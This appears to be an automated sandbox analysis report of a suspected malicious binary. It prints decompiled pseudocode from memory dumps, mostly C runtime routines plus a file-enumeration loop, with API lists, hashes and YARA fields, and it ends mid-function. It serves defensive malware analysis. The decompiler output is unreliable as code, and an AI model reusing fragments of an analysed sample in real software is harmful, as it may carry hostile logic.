                                        								__eflags = _t125 - 0xffffffff;
                                        								if(_t125 != 0xffffffff) {
                                        									_t102 = _v608;
                                        									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
                                        									__eflags = _t62;
                                        									_v616 = _t62 >> 2;
                                        									_t64 = 0x2e;
                                        									do {
                                        										__eflags = _v604.cFileName - _t64;
                                        										if(_v604.cFileName != _t64) {
                                        											L36:
                                        											_push(_t102);
                                        											_t66 = E00404A29(_t102,  &(_v604.cFileName), _t88, _v612);
                                        											_t134 = _t134 + 0x10;
                                        											__eflags = _t66;
                                        											if(_t66 != 0) {
                                        												goto L26;
                                        											} else {
                                        												goto L37;
                                        											}
                                        										} else {
                                        											__eflags = _v558 - _t117;
                                        											if(_v558 == _t117) {
                                        												goto L37;
                                        											} else {
                                        												__eflags = _v558 - _t64;
                                        												if(_v558 != _t64) {
                                        													goto L36;
                                        												} else {
                                        													__eflags = _v556 - _t117;
                                        													if(_v556 == _t117) {
                                        														goto L37;
                                        													} else {
                                        														goto L36;
                                        													}
                                        												}
                                        											}
                                        										}
                                        										goto L40;
                                        										L37:
                                        										_t70 = FindNextFileW(_t125,  &_v604);
                                        										_t102 = _v608;
                                        										__eflags = _t70;
                                        										_t64 = 0x2e;
                                        									} while (_t70 != 0);
                                        									_t71 = _t102;
                                        									_t105 = _v616;
                                        									_t111 =  *_t71;
                                        									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
                                        									__eflags = _t105 - _t74;
                                        									if(_t105 != _t74) {
                                        										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
                                        									}
                                        								} else {
                                        									_push(_v608);
                                        									_t66 = E00404A29(_t101, _t88, _t117, _t117);
                                        									L26:
                                        									_t117 = _t66;
                                        								}
                                        								__eflags = _t125 - 0xffffffff;
                                        								if(_t125 != 0xffffffff) {
                                        									FindClose(_t125);
                                        								}
                                        								_t67 = _t117;
                                        							} else {
                                        								__eflags = _t98 -  &(_t88[1]);
                                        								if(_t98 ==  &(_t88[1])) {
                                        									goto L19;
                                        								} else {
                                        									_push(_t109);
                                        									_t67 = E00404A29(_t98, _t88, 0, 0);
                                        								}
                                        							}
                                        							__eflags = _v12 ^ _t130;
                                        							E004018CC();
                                        							return _t67;
                                        						} else {
                                        							goto L6;
                                        						}
                                        					}
                                        				} else {
                                        					_t82 = 0xc;
                                        					L8:
                                        					return _t82;
                                        				}
                                        				L40:
                                        			}


                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                        • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                        • Opcode Fuzzy Hash: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                        • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E00098E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				intOrPtr _t15;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t42;
                                        
                                        				if(_a4 > 5 || _a8 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t42 = E000932EE(8, 1);
                                        					_t48 = _t42;
                                        					if(_t42 != 0) {
                                        						_t12 = E000932EE(0xb8, 1);
                                        						 *_t42 = _t12;
                                        						__eflags = _t12;
                                        						if(_t12 != 0) {
                                        							_t13 = E000932EE(0x220, 1);
                                        							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                        							__eflags = _t13;
                                        							if(_t13 != 0) {
                                        								E0009899A( *_t42, 0xae2e8);
                                        								_t15 = E00099285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								__eflags = _t15;
                                        								if(__eflags == 0) {
                                        									L14:
                                        									E000932B6();
                                        									E0009363B( *_t42);
                                        									E000934E1( *_t42);
                                        									E000932B6(_t42);
                                        									_t42 = 0;
                                        									L16:
                                        									return _t42;
                                        								}
                                        								_push( *((intOrPtr*)( *_t42 + 4)));
                                        								_t22 = E00093D75(__edx, 1, __eflags);
                                        								__eflags = _t22;
                                        								if(_t22 == 0) {
                                        									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                        									goto L16;
                                        								}
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								goto L14;
                                        							}
                                        							E000932B6( *_t42);
                                        							E000932B6(_t42);
                                        							L8:
                                        							goto L3;
                                        						}
                                        						E000932B6(_t42);
                                        						goto L8;
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E00094196(_t48))) = 0xc;
                                        					goto L4;
                                        				}
                                        			}


                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: cfa6a1b8d3433a1847bc266781531af2080a79cd1a38b141ccd30028954bf8bc
                                        • Instruction ID: b97cb3ffaf5d7643bf12991928e3b030b4792723ad36ee483a36947f184643f8
                                        • Opcode Fuzzy Hash: cfa6a1b8d3433a1847bc266781531af2080a79cd1a38b141ccd30028954bf8bc
                                        • Instruction Fuzzy Hash: E221A835104611EAEF717F65DC12E9BBBE5DF43750B108429F448592A3EF328910FB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00098F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                        				signed int _v8;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				void* _t38;
                                        				signed int _t45;
                                        				signed int _t60;
                                        				intOrPtr _t77;
                                        				void* _t80;
                                        				intOrPtr* _t82;
                                        				signed int _t83;
                                        				signed int _t86;
                                        				intOrPtr _t88;
                                        				void* _t92;
                                        
                                        				_t80 = __edx;
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_t86 = 0;
                                        				if(_a12 <= 0) {
                                        					L5:
                                        					return _t38;
                                        				} else {
                                        					_push(__edi);
                                        					_t82 =  &_a12;
                                        					while(1) {
                                        						_t82 = _t82 + 4;
                                        						_t38 = E0009551B(_a4, _a8,  *_t82);
                                        						_t92 = _t92 + 0xc;
                                        						if(_t38 != 0) {
                                        							break;
                                        						}
                                        						_t86 = _t86 + 1;
                                        						if(_t86 < _a12) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L20;
                                        					}
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					E00094112(0, _t80);
                                        					asm("int3");
                                        					_push(0x14);
                                        					_push(0xacf88);
                                        					E000927F0(0, _t82, _t86);
                                        					_t66 = 0;
                                        					_v32 = 0;
                                        					__eflags = _a4 - 5;
                                        					if(__eflags <= 0) {
                                        						_t88 = E000915FE();
                                        						_v36 = _t88;
                                        						E000936DB(0, _t80, _t82, _t88, __eflags);
                                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                        						_v8 = _v8 & 0;
                                        						_t83 = E000932EE(0xb8, 1);
                                        						_v40 = _t83;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							E00093117(0xc);
                                        							_v8 = 1;
                                        							E0009899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                        							_v8 = _v8 & 0x00000000;
                                        							E000990D1();
                                        							_t66 = E00099285(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                        							_v32 = _t66;
                                        							__eflags = _t66;
                                        							if(_t66 == 0) {
                                        								E0009363B(_t83);
                                        								_t43 = E000934E1(_t83);
                                        							} else {
                                        								__eflags = _a8;
                                        								if(_a8 != 0) {
                                        									_t60 = E0009DB06(_a8, 0xae17c);
                                        									__eflags = _t60;
                                        									if(_t60 != 0) {
                                        										 *0xf0a44 = 1;
                                        									}
                                        								}
                                        								E00093117(0xc);
                                        								_v8 = 2;
                                        								_t25 = _t88 + 0x6c; // 0x6c
                                        								E0009375B(_t25, _t83);
                                        								E0009363B(_t83);
                                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                        									__eflags =  *0xaecf4 & 0x00000001;
                                        									if(( *0xaecf4 & 0x00000001) == 0) {
                                        										E0009375B("��",  *((intOrPtr*)(_t88 + 0x6c)));
                                        										_t77 =  *0xae2e4; // 0xae2e8
                                        										_t32 = _t77 + 0x84; // 0xaed00
                                        										 *0xaecf8 =  *_t32;
                                        										_t33 = _t77 + 0x90; // 0xa9570
                                        										 *0xaed54 =  *_t33;
                                        										_t34 = _t77 + 0x74; // 0x1
                                        										 *0xae178 =  *_t34;
                                        									}
                                        								}
                                        								_v8 = _v8 & 0x00000000;
                                        								_t43 = E000990E0();
                                        							}
                                        						}
                                        						_v8 = 0xfffffffe;
                                        						E00099113(_t43, _t88);
                                        						_t45 = _t66;
                                        					} else {
                                        						 *((intOrPtr*)(E00094196(__eflags))) = 0x16;
                                        						E000940E7();
                                        						_t45 = 0;
                                        					}
                                        					return E00092835(_t45);
                                        				}
                                        				L20:
                                        			}


















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-2599400749
                                        • Opcode ID: f10b41ae5d2b567018f9102bd33a8dd03ea61db9b6a807298e2deee4537b72c8
                                        • Instruction ID: 34fa5f32ff1382576646ec1ec41aad014c6188766e5efbf1e73dae29dbb38186
                                        • Opcode Fuzzy Hash: f10b41ae5d2b567018f9102bd33a8dd03ea61db9b6a807298e2deee4537b72c8
                                        • Instruction Fuzzy Hash: E941C132504305AFDF20AFA8DD82BDD7BE5AF45314F10842DFA1896293DB768641EB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E0009197C(void* __eax, void* __ebx) {
                                        				intOrPtr _t5;
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void* _t14;
                                        				void* _t24;
                                        				intOrPtr* _t25;
                                        				signed int _t26;
                                        				signed int _t27;
                                        
                                        				_t14 = __ebx;
                                        				__imp__DecodePointer( *0xf1b34);
                                        				_t25 =  *0xefcfc; // 0x0
                                        				_t24 = __eax;
                                        				if(_t25 != 0) {
                                        					while( *_t25 != 0) {
                                        						E000932B6( *_t25);
                                        						_t25 = _t25 + 4;
                                        						if(_t25 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t25 =  *0xefcfc; // 0x0
                                        				}
                                        				_push(_t14);
                                        				E000932B6(_t25);
                                        				_t26 =  *0xefcf8; // 0x0
                                        				 *0xefcfc = 0;
                                        				if(_t26 != 0) {
                                        					while( *_t26 != 0) {
                                        						E000932B6( *_t26);
                                        						_t26 = _t26 + 4;
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t26 =  *0xefcf8; // 0x0
                                        				}
                                        				E000932B6(_t26);
                                        				 *0xefcf8 = 0;
                                        				E000932B6( *0xefcf4);
                                        				_t5 = E000932B6( *0xefcf0);
                                        				_t27 = _t26 | 0xffffffff;
                                        				 *0xefcf4 = 0;
                                        				 *0xefcf0 = 0;
                                        				if(_t24 != _t27 &&  *0xf1b34 != 0) {
                                        					_t5 = E000932B6(_t24);
                                        				}
                                        				__imp__EncodePointer(_t27);
                                        				 *0xf1b34 = _t5;
                                        				_t6 =  *0xf06f4;
                                        				if( *0xf06f4 != 0) {
                                        					E000932B6(_t6);
                                        					 *0xf06f4 = 0;
                                        				}
                                        				_t7 =  *0xf06f8;
                                        				if( *0xf06f8 != 0) {
                                        					E000932B6(_t7);
                                        					 *0xf06f8 = 0;
                                        				}
                                        				_t8 =  *0xae7d4; // 0xae5b0
                                        				asm("lock xadd [eax], esi");
                                        				if(_t27 == 1) {
                                        					_t8 =  *0xae7d4; // 0xae5b0
                                        					if(_t8 != 0xae5b0) {
                                        						_t9 = E000932B6(_t8);
                                        						 *0xae7d4 = 0xae5b0;
                                        						return _t9;
                                        					}
                                        				}
                                        				return _t8;
                                        			}












                                        APIs
                                        • DecodePointer.KERNEL32 ref: 00091984
                                        • _free.LIBCMT ref: 0009199D
                                          • Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
                                          • Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC
                                        • _free.LIBCMT ref: 000919B0
                                        • _free.LIBCMT ref: 000919CE
                                        • _free.LIBCMT ref: 000919E0
                                        • _free.LIBCMT ref: 000919F1
                                        • _free.LIBCMT ref: 000919FC
                                        • _free.LIBCMT ref: 00091A20
                                        • EncodePointer.KERNEL32(00000000), ref: 00091A27
                                        • _free.LIBCMT ref: 00091A3C
                                        • _free.LIBCMT ref: 00091A52
                                        • _free.LIBCMT ref: 00091A7A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
                                        • Instruction ID: 55037b5f61b98b7ab115b077da11ff23c629134b0c359b20dc8f913433ebceba
                                        • Opcode Fuzzy Hash: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
                                        • Instruction Fuzzy Hash: 98217E72B061538FEF609F24FD809A9B7E5AB06B213350039EC14A7266DF388D44EB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E000917CB(void* __edx, char* _a4, short* _a8) {
                                        				int _v8;
                                        				void* __ecx;
                                        				intOrPtr* _t7;
                                        				intOrPtr _t9;
                                        				short* _t10;
                                        				short* _t12;
                                        				short* _t14;
                                        				int _t15;
                                        				short* _t22;
                                        				int _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				short* _t33;
                                        				intOrPtr _t34;
                                        
                                        				_t31 = __edx;
                                        				_push(_t27);
                                        				_t24 = 0;
                                        				_t36 = _a4;
                                        				if(_a4 != 0) {
                                        					_t33 = _a8;
                                        					__eflags = _t33;
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					}
                                        					_t10 = E00092D64(_t27);
                                        					__eflags = _t10;
                                        					if(_t10 == 0) {
                                        						_t22 = AreFileApisANSI();
                                        						__eflags = _t22;
                                        						if(_t22 == 0) {
                                        							_t24 = 1;
                                        							__eflags = 1;
                                        						}
                                        					}
                                        					 *_t33 = 0;
                                        					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
                                        					_v8 = _t12;
                                        					__eflags = _t12;
                                        					if(_t12 != 0) {
                                        						_t14 = E00093336(_t31, _t12 + _t12);
                                        						 *_t33 = _t14;
                                        						__eflags = _t14;
                                        						if(_t14 == 0) {
                                        							goto L9;
                                        						}
                                        						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
                                        						__eflags = _t15;
                                        						if(_t15 != 0) {
                                        							_t9 = 1;
                                        							__eflags = 1;
                                        							goto L14;
                                        						}
                                        						E00094175(GetLastError());
                                        						E000932B6( *_t33);
                                        						 *_t33 =  *_t33 & 0x00000000;
                                        						goto L8;
                                        					} else {
                                        						E00094175(GetLastError());
                                        						L8:
                                        						L9:
                                        						_t9 = 0;
                                        						L14:
                                        						return _t9;
                                        					}
                                        				}
                                        				L1:
                                        				_t7 = E00094196(_t36);
                                        				_t34 = 0x16;
                                        				 *_t7 = _t34;
                                        				E000940E7();
                                        				_t9 = _t34;
                                        				goto L14;
                                        			}


















                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 000917F5
                                        • AreFileApisANSI.KERNEL32 ref: 000917FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00091818
                                        • GetLastError.KERNEL32 ref: 00091825
                                        • __dosmaperr.LIBCMT ref: 0009182C
                                          • Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
                                        • Instruction ID: 024ed592de540ba5a6cdae41f488b0d52b33d50c810ab537c6bc44784393a71c
                                        • Opcode Fuzzy Hash: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
                                        • Instruction Fuzzy Hash: 34118EB2604206BFEF606FB09C08EEBB6ECEF05761B208528F951D5192EE30C841B760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E00091DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int* _t82;
                                        				signed int _t86;
                                        				long _t90;
                                        				void* _t91;
                                        				intOrPtr _t94;
                                        				signed int _t98;
                                        				signed int _t99;
                                        				signed char _t103;
                                        				void** _t105;
                                        				void** _t106;
                                        				void** _t109;
                                        				signed char _t111;
                                        				long _t119;
                                        				void* _t129;
                                        				signed int* _t133;
                                        				void* _t135;
                                        				signed int* _t138;
                                        				void** _t139;
                                        				void* _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				void** _t147;
                                        				signed int _t149;
                                        				void* _t150;
                                        				void** _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        
                                        				_push(0x64);
                                        				_push(0xacd50);
                                        				E000927F0(__ebx, __edi, __esi);
                                        				E00093117(0xb);
                                        				 *(_t155 - 4) = 0;
                                        				_push(0x40);
                                        				_t141 = 0x20;
                                        				_push(_t141);
                                        				_t82 = E000932EE();
                                        				_t133 = _t82;
                                        				 *(_t155 - 0x24) = _t133;
                                        				if(_t133 != 0) {
                                        					 *0xefd20 = _t82;
                                        					 *0xf1b28 = _t141;
                                        					while(_t133 <  &(_t82[0x200])) {
                                        						_t133[1] = 0xa00;
                                        						 *_t133 =  *_t133 | 0xffffffff;
                                        						_t133[2] = 0;
                                        						_t133[9] = _t133[9] & 0x00000080;
                                        						_t133[9] = _t133[9] & 0x0000007f;
                                        						_t133[9] = 0xa0a;
                                        						_t133[0xe] = 0;
                                        						_t133[0xd] = 0;
                                        						_t133 =  &(_t133[0x10]);
                                        						 *(_t155 - 0x24) = _t133;
                                        						_t82 =  *0xefd20; // 0x0
                                        					}
                                        					GetStartupInfoW(_t155 - 0x74);
                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                        						L27:
                                        						_t129 = 0xfffffffe;
                                        						L28:
                                        						_t142 = 0;
                                        						while(1) {
                                        							 *(_t155 - 0x2c) = _t142;
                                        							if(_t142 >= 3) {
                                        								break;
                                        							}
                                        							_t147 =  *0xefd20 + (_t142 << 6);
                                        							 *(_t155 - 0x24) = _t147;
                                        							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                                        								_t147[1] = 0x81;
                                        								if(_t142 != 0) {
                                        									_t65 = _t142 - 1; // -1
                                        									asm("sbb eax, eax");
                                        									_t90 =  ~_t65 + 0xfffffff5;
                                        								} else {
                                        									_t90 = 0xfffffff6;
                                        								}
                                        								_t91 = GetStdHandle(_t90);
                                        								 *(_t155 - 0x1c) = _t91;
                                        								if(_t91 == 0xffffffff || _t91 == 0) {
                                        									L45:
                                        									_t147[1] = _t147[1] | 0x00000040;
                                        									 *_t147 = _t129;
                                        									_t94 =  *0xf1a80;
                                        									if(_t94 != 0) {
                                        										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                                        									}
                                        									goto L47;
                                        								} else {
                                        									_t98 = GetFileType(_t91);
                                        									if(_t98 == 0) {
                                        										goto L45;
                                        									}
                                        									 *_t147 =  *(_t155 - 0x1c);
                                        									_t99 = _t98 & 0x000000ff;
                                        									if(_t99 != 2) {
                                        										if(_t99 != 3) {
                                        											L44:
                                        											_t71 =  &(_t147[3]); // -982292
                                        											E00092D36(_t71, 0xfa0, 0);
                                        											_t156 = _t156 + 0xc;
                                        											_t147[2] = _t147[2] + 1;
                                        											goto L47;
                                        										}
                                        										_t103 = _t147[1] | 0x00000008;
                                        										L43:
                                        										_t147[1] = _t103;
                                        										goto L44;
                                        									}
                                        									_t103 = _t147[1] | 0x00000040;
                                        									goto L43;
                                        								}
                                        							} else {
                                        								_t147[1] = _t147[1] | 0x00000080;
                                        								L47:
                                        								_t142 = _t142 + 1;
                                        								continue;
                                        							}
                                        						}
                                        						 *(_t155 - 4) = _t129;
                                        						E0009207A();
                                        						_t86 = 0;
                                        						L49:
                                        						return E00092835(_t86);
                                        					}
                                        					_t105 =  *(_t155 - 0x40);
                                        					if(_t105 == 0) {
                                        						goto L27;
                                        					}
                                        					_t135 =  *_t105;
                                        					 *(_t155 - 0x1c) = _t135;
                                        					_t106 =  &(_t105[1]);
                                        					 *(_t155 - 0x28) = _t106;
                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                        					if(_t135 >= 0x800) {
                                        						_t135 = 0x800;
                                        						 *(_t155 - 0x1c) = 0x800;
                                        					}
                                        					_t149 = 1;
                                        					 *(_t155 - 0x30) = 1;
                                        					while( *0xf1b28 < _t135) {
                                        						_t138 = E000932EE(_t141, 0x40);
                                        						 *(_t155 - 0x24) = _t138;
                                        						if(_t138 != 0) {
                                        							0xefd20[_t149] = _t138;
                                        							 *0xf1b28 =  *0xf1b28 + _t141;
                                        							while(_t138 <  &(0xefd20[_t149][0x200])) {
                                        								_t138[1] = 0xa00;
                                        								 *_t138 =  *_t138 | 0xffffffff;
                                        								_t138[2] = 0;
                                        								_t138[9] = _t138[9] & 0x00000080;
                                        								_t138[9] = 0xa0a;
                                        								_t138[0xe] = 0;
                                        								_t138[0xd] = 0;
                                        								_t138 =  &(_t138[0x10]);
                                        								 *(_t155 - 0x24) = _t138;
                                        							}
                                        							_t149 = _t149 + 1;
                                        							 *(_t155 - 0x30) = _t149;
                                        							_t135 =  *(_t155 - 0x1c);
                                        							continue;
                                        						}
                                        						_t135 =  *0xf1b28;
                                        						 *(_t155 - 0x1c) = _t135;
                                        						break;
                                        					}
                                        					_t143 = 0;
                                        					 *(_t155 - 0x2c) = 0;
                                        					_t129 = 0xfffffffe;
                                        					_t109 =  *(_t155 - 0x28);
                                        					_t139 =  *(_t155 - 0x20);
                                        					while(_t143 < _t135) {
                                        						_t150 =  *_t139;
                                        						if(_t150 == 0xffffffff || _t150 == _t129) {
                                        							L22:
                                        							_t143 = _t143 + 1;
                                        							 *(_t155 - 0x2c) = _t143;
                                        							_t109 =  &(( *(_t155 - 0x28))[0]);
                                        							 *(_t155 - 0x28) = _t109;
                                        							_t139 =  &(_t139[1]);
                                        							 *(_t155 - 0x20) = _t139;
                                        							continue;
                                        						} else {
                                        							_t111 =  *_t109;
                                        							if((_t111 & 0x00000001) == 0) {
                                        								goto L22;
                                        							}
                                        							if((_t111 & 0x00000008) != 0) {
                                        								L20:
                                        								_t154 = 0xefd20[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                        								 *(_t155 - 0x24) = _t154;
                                        								 *_t154 =  *_t139;
                                        								_t154[1] =  *( *(_t155 - 0x28));
                                        								_t37 =  &(_t154[3]); // 0xd
                                        								E00092D36(_t37, 0xfa0, 0);
                                        								_t156 = _t156 + 0xc;
                                        								_t154[2] = _t154[2] + 1;
                                        								_t139 =  *(_t155 - 0x20);
                                        								L21:
                                        								_t135 =  *(_t155 - 0x1c);
                                        								goto L22;
                                        							}
                                        							_t119 = GetFileType(_t150);
                                        							_t139 =  *(_t155 - 0x20);
                                        							if(_t119 == 0) {
                                        								goto L21;
                                        							}
                                        							goto L20;
                                        						}
                                        					}
                                        					goto L28;
                                        				}
                                        				_t86 = E00094E90(_t155, 0xaece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                        				goto L49;
                                        			}

                                        APIs
                                        • __lock.LIBCMT ref: 00091DDD
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • __calloc_crt.LIBCMT ref: 00091DEE
                                          • Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00091E09
                                        • GetStartupInfoW.KERNEL32(?,000ACD50,00000064,00091146,000ACCC0,00000014), ref: 00091E62
                                        • __calloc_crt.LIBCMT ref: 00091EAD
                                        • GetFileType.KERNEL32(00000001), ref: 00091EF6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: 5e9fcf483146f10413883ca7f10e6759a0de71e2087d0f3c8e1298bb31543eaf
                                        • Instruction ID: f7c14dc26cf176d419ad1a3d534759837349f44964dcf94711b9ad3e31d60c39
                                        • Opcode Fuzzy Hash: 5e9fcf483146f10413883ca7f10e6759a0de71e2087d0f3c8e1298bb31543eaf
                                        • Instruction Fuzzy Hash: B281B471A0424A9FDF24CF64CC515EDBBF0BF49324B24426DD4A6AB3D1D7399802EB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 70%
                                        			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                        				signed int _v8;
                                        				int _v12;
                                        				void* _v24;
                                        				signed int _t49;
                                        				signed int _t54;
                                        				int _t56;
                                        				signed int _t58;
                                        				short* _t60;
                                        				signed int _t64;
                                        				short* _t68;
                                        				int _t76;
                                        				short* _t79;
                                        				signed int _t85;
                                        				signed int _t88;
                                        				void* _t93;
                                        				void* _t94;
                                        				int _t96;
                                        				short* _t99;
                                        				int _t101;
                                        				int _t103;
                                        				signed int _t104;
                                        				short* _t105;
                                        				void* _t108;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t49 =  *0x412014; // 0x2327c9ba
                                        				_v8 = _t49 ^ _t104;
                                        				_t101 = _a20;
                                        				if(_t101 > 0) {
                                        					_t76 = E004080D8(_a16, _t101);
                                        					_t108 = _t76 - _t101;
                                        					_t4 = _t76 + 1; // 0x1
                                        					_t101 = _t4;
